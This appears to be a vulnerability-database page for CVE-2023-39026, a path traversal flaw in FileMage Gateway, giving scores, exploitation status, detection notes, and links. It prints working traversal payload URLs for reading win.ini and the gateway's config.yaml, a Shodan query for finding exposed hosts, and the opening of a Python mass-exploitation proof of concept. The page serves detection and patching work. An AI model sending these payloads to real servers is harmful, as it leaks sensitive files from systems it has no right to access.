CVE-2023-39026
published 2023-08-22CVE-2023-39026: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a…
PriorityP276high7.5CVSS 3.1
AVNACLPRNUINSUCHINAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
10.56%
95.2th percentile
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| filemage | filemage | <= 1.10.8 | — |
Detection & IOCsextracted from sources · hover to see the quote
path/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini↗
path/mgmnt/..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cprogramdata%5cfilemage%5cgateway%5cconfig.yaml↗
- →Detect exploitation attempts by matching HTTP GET requests to the /mgmnt/ path containing URL-encoded backslash traversal sequences (%5c) targeting win.ini or config.yaml ↗
- →A successful exploitation response will be HTTP 200 with Content-Type text/plain and body containing the strings 'bit app support', 'extensions', and 'fonts' (win.ini content) ↗
- →Exploitation of the config.yaml path can be confirmed by checking for the string 'tls' in the response body, indicating the FileMage gateway configuration file was leaked ↗
- →Use Shodan query title:"FileMage" to identify exposed FileMage Gateway instances for proactive detection and asset inventory ↗
- ·The exploit targets Windows deployments specifically via URL-encoded backslash (%5c) traversal; Linux/non-Windows deployments use forward slashes and may not be vulnerable to this exact payload ↗
- ·The Exploit-DB PoC targets Azure deployments specifically and versions strictly below 1.10.9; the NVD entry covers v.1.10.8 and before for Windows deployments ↗
- ·The vulnerable management endpoint is /mgmnt/ (with an extra 'n') in the actual exploit payloads, not /mgmt/ as described in the CVE advisory — detection rules should cover both variants ↗
CVSS provenance
nvdv3.17.5HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-6m35-6x4j-hxjg: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v
ghsa_unreviewed·2023-08-23
CVE-2023-39026 [HIGH] CWE-22 GHSA-6m35-6x4j-hxjg: Directory Traversal vulnerability in FileMage Gateway Windows Deployments v
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
VulnCheck
filemage filemage Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
vulncheck·2023·CVSS 7.5
CVE-2023-39026 [HIGH] filemage filemage Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
filemage filemage Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
Affected: filemage filemage
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-39026; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-20&host_type=src&vulnerability=cve-2023-39026; https://dashboard.shadowse
No detection rules found.
Exploit-DB
FileMage Gateway 1.10.9 - Local File Inclusion
exploitdb·2023-09-04·CVSS 7.5
CVE-2023-39026 [HIGH] FileMage Gateway 1.10.9 - Local File Inclusion
FileMage Gateway 1.10.9 - Local File Inclusion
---
# Exploit Title: FileMage Gateway 1.10.9 - Local File Inclusion
# Date: 8/22/2023
# Exploit Author: Bryce "Raindayzz" Harty
# Vendor Homepage: https://www.filemage.io/
# Version: Azure Versions < 1.10.9
# Tested on: All Azure deployments < 1.10.9
# CVE : CVE-2023-39026
# Technical Blog - https://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.html
# Patch from vendor - https://www.filemage.io/docs/updates.html
import requests
import warnings
warnings.filterwarnings("ignore")
def worker(url):
response = requests.get(url, verify=False, timeout=.5)
return response
def main():
listIP = []
file_path = input("Enter the path to the file containing the IP addresses: ")
with open(file_path, 'r') as file:
ip_list = file.read().spli
Nuclei
FileMage Gateway - Directory Traversal
nuclei·CVSS 7.5
CVE-2023-39026 [HIGH] FileMage Gateway - Directory Traversal
FileMage Gateway - Directory Traversal
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
Template:
id: CVE-2023-39026
info:
name: FileMage Gateway - Directory Traversal
author: DhiyaneshDk
severity: high
description: |
Directory Traversal vulnerability in FileMage Gateway Windows Deployments v.1.10.8 and before allows a remote attacker to obtain sensitive information via a crafted request to the /mgmt/ component.
impact: |
An attacker can view, modify, or delete sensitive files on the system, potentially leading to unauthorized access, data leakage, or system compromise.
remediation: |
Apply the latest security patches or updates provided b
No writeups or analysis indexed.
http://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.htmlhttps://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.htmlhttps://www.filemage.io/docs/updates.html#change-loghttp://packetstormsecurity.com/files/174491/FileMage-Gateway-1.10.9-Local-File-Inclusion.htmlhttps://raindayzz.com/technicalblog/2023/08/20/FileMage-Vulnerability.htmlhttps://www.filemage.io/docs/updates.html#change-log
2023-08-22
Published
Exploited in the wild